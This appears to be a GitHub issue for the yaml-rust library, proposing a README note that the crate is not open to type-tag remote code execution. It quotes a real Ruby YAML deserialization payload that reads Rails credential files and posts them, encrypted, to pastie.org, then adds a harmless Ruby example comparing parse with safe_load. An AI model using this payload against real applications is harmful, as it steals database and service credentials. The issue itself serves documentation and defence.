Open
Description
Let's document in the README that yaml-rust does not attempt to instantiate arbitrary Rust types and is not vulnerable to the sort of type-based remote code execution that affects some Ruby and Java yaml libraries.
https://community.embarcadero.com/blogs/entry/yaml-and-remote-code-execution-38738
```yaml
exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? ! "foo\n(require 'net/http'\nrequire 'digest'\nrequire 'openssl'\nrequire 'base64'\n\naes
= proc { |text|\n # sourzed from MetaSploit, best pwning t00l ev4r!\n aes_256
= OpenSSL::Cipher.new('aes-256-cbc')\n aes_256.encrypt\n aes_256.key = Digest::MD5.hexdigest(`uname
-r`)\n\n crypted = aes_256.update(text)\n crypted << aes_256.final\n\n Base64.encode64(crypted)\n}\n\nexfil
= proc { |path|\n if File.file?(path) == true\n \"::: #{path} :::\\n\\n#{File.read(path)}\"\n
\ end\n}\n\nloot = [\"config/database.yml\", \"config/librato.yml\", \"config/newrelic.yml\",
\"config/rubygems.yml\"].map { |path| exfil.call(path) }.join\n\nif !(loot.empty?)\nNet::HTTP.post_form(URI('http://pastie.org/pastes'),
{\n 'paste[authorization]' => 'burger',\n 'paste[access_key]' => '',\n 'paste[parse_id]'
\ => '6',\n 'paste[body]' => \"e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\\n\\n#{aes.call(loot)}\",\n
\ 'paste[restricted]' => '0',\n 'commit' => 'Create Paste'\n})\nend;
@executed = true) unless @executed\n__END__\n"
: !ruby/object:OpenStruct
```
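The difference between a loader that acts on `!ruby/...` tags and one that treats them as inert text, shown from the Ruby side as an added example (not part of the issue and not yaml-rust code). The sample documents and the class name `DemoCollection` are constructed; only Ruby's bundled Psych (`YAML.parse`, `YAML.safe_load`) is used.

```ruby
require 'yaml'

# Constructed, harmless document that carries the same kinds of type tags
# as the payload quoted in the issue. DemoCollection is a made-up name.
TAGGED = <<~DOC
  outer: !ruby/hash:DemoCollection
    key: !ruby/object:OpenStruct
      table:
        name: demo
DOC

# Constructed document with no type tags at all.
PLAIN = "name: demo\nports: [80, 443]\n"

# Walk the parsed node tree and collect every explicit tag.
# YAML.parse only builds Psych::Nodes; no Ruby class is looked up or
# instantiated, so the tags are just strings here.
def tags_in(yaml)
  doc = YAML.parse(yaml)
  return [] unless doc
  doc.map(&:tag).compact.uniq.sort
end

# Load untrusted input with the restricted loader. A tag that names a
# class outside the permitted list raises instead of building the object.
def load_untrusted(yaml)
  [:ok, YAML.safe_load(yaml)]
rescue Psych::DisallowedClass => e
  [:rejected, e.message]
end

if __FILE__ == $PROGRAM_NAME
  puts "tags seen: #{tags_in(TAGGED).inspect}"
  puts "tagged:    #{load_untrusted(TAGGED).inspect}"
  puts "plain:     #{load_untrusted(PLAIN).inspect}"
end
```

A loader that never maps tags to native types, as the issue describes for yaml-rust, sits in the `tags_in` position: it can see the tag text but has no code path that turns it into an object.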